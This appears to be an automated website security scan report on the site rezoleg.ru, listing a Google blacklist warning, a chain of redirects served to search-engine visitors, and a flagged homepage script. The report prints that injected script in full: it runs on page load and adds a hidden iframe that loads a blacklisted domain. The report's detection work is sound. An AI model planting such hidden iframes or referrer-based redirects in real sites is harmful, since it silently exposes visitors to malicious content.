Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rezoleg.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.rezoleg.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.rezoleg.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 30 Jan 2015 13:56:02 GMT Location: http://web-redirect.ru/?web Server: nginx/1.4.1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: _cutt_caches_images=1422626162; expires=Sat, 31-Jan-2015 13:56:02 GMT; path=/ X-Powered-By: PHP/5.3.13 | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Fri, 30 Jan 2015 13:56:02 GMT Pragma: no-cache Location: http://tatkuchma.com/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Fri, 30 Jan 2015 13:56:02 GMT X-Powered-By: PHP/5.3.3 | suspicious |
URL: http://tatkuchma.com/components/com_weblinks/2/separator.php (imitation of visitor from search engine) GET /components/com_weblinks/2/separator.php HTTP/1.1 Host: tatkuchma.com Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 30 Jan 2015 13:56:02 GMT Location: http://tvoiprazdnik.by/unit/ Server: nginx/1.4.4 Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://www.rezoleg.ru/ | 200 OK Content-Length: 3621 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com

    if (document.loaded) {
        showBrowVer();
    } else {
        if (window.addEventListener) {
            window.addEventListener('load', showBrowVer, false);
        } else {
            window.attachEvent('onload', showBrowVer);
        }
    }
    function showBrowVer() {
        var divTag = document.createElement('div');
        divTag.id = 'dt';
        document.body.appendChild(divTag);
        var js_kod2 = document.createElement('iframe');
        js_kod2.src = 'http://24corp-shop.com';
        js_kod2.width = '250px';
        js_kod2.height = '320px';
        js_kod2.setAttribute('style', 'visibility:hidden');
        document.getElementById('dt').appendChild(js_kod2);
    }

Decoded script:

    function showBrowVer() {
        var divTag = document.createElement("div");
        divTag.id = "dt";
        document.body.appendChild(divTag);
        var js_kod2 = document.createElement("iframe");
        js_kod2.src = "http://24corp-shop.com";
        js_kod2.width = "250px";
        js_kod2.height = "320px";
        js_kod2.setAttribute("style", "visibility:hidden");
        document.getElementById("dt").appendChild(js_kod2);
    }

http://www.rezoleg.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://www.rezoleg.ru/test404page.js | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |